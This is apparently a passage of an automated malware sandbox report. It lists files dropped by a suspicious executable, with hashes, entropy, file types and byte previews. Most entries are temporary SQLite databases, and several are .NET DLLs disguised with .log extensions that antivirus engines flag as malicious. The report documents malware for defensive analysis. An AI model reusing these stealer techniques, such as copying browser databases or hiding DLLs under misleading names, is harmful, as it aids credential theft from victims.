                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.5707520969659783
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\xlABKcQKTK

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.5712781801655107
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\xsxgFyTPWg

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40960
                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\yBYDqVhS9C

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.5712781801655107
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\yCx5z9rl2K

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):114688
                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\yMRtY9BSlD

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):28672
                                                                                                                          Entropy (8bit):2.5793180405395284
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\yQDntTPA2J

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40960
                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\yoDbS0GleE

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):114688
                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\yzcz258tW2

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40960
                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\zYqo3JlULH

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):114688
                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\zaQ0bYRCWr

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):106496
                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\zsg8J9PWI6

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):106496
                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\Desktop\AaEpKsEu.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\r6cRyCpdfS.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):69632
                                                                                                                          Entropy (8bit):5.932541123129161
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                          MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                          SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                          SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                          SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                          Joe Sandbox View:
                                                                                                                          • Filename: tBnELFfQoe.exe, Detection: malicious, Browse
                                                                                                                          • Filename: Z4D3XAZ2jB.exe, Detection: malicious, Browse
                                                                                                                          • Filename: 67VB5TS184.exe, Detection: malicious, Browse
                                                                                                                          • Filename: F3ePjP272h.exe, Detection: malicious, Browse
                                                                                                                          • Filename: cbCjTbodwa.exe, Detection: malicious, Browse
                                                                                                                          • Filename: vb8DOBZQ4X.exe, Detection: malicious, Browse
                                                                                                                          • Filename: 6G8OR42xrB.exe, Detection: malicious, Browse
                                                                                                                          • Filename: XNPOazHpXF.exe, Detection: malicious, Browse
                                                                                                                          • Filename: 3e88PGFfkf.exe, Detection: malicious, Browse
                                                                                                                          • Filename: 9FwQYJSj4N.exe, Detection: malicious, Browse
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                                                          C:\Users\user\Desktop\BVvzTrPR.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):294912
                                                                                                                          Entropy (8bit):6.010605469502259
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                                                                          MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                                                                          SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                                                                          SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                                                                          SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                                                                          C:\Users\user\Desktop\CdKPGOIP.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):126976
                                                                                                                          Entropy (8bit):6.057993947082715
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                                                                          MD5:16B480082780CC1D8C23FB05468F64E7
                                                                                                                          SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                                                                          SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                                                                          SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                                                                                          C:\Users\user\Desktop\DGaPaFaK.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):39936
                                                                                                                          Entropy (8bit):5.629584586954759
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                                                                          MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                                                                          SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                                                                          SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                                                                          SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                          C:\Users\user\Desktop\FlHYcgCL.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):32256
                                                                                                                          Entropy (8bit):5.631194486392901
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                          MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                          SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                          SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                          SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                          C:\Users\user\Desktop\GzqyMBLI.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):342528
                                                                                                                          Entropy (8bit):6.170134230759619
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                                                                          MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                                                                          SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                                                                          SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                                                                          SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                          C:\Users\user\Desktop\JVTxIHOe.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\r6cRyCpdfS.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):41472
                                                                                                                          Entropy (8bit):5.6808219961645605
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                                                                          MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                                                                          SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                                                                          SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                                                                          SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                          C:\Users\user\Desktop\LGyNPUZX.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\r6cRyCpdfS.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):64000
                                                                                                                          Entropy (8bit):5.857602289000348
                                                                                                                          Encrypted:false
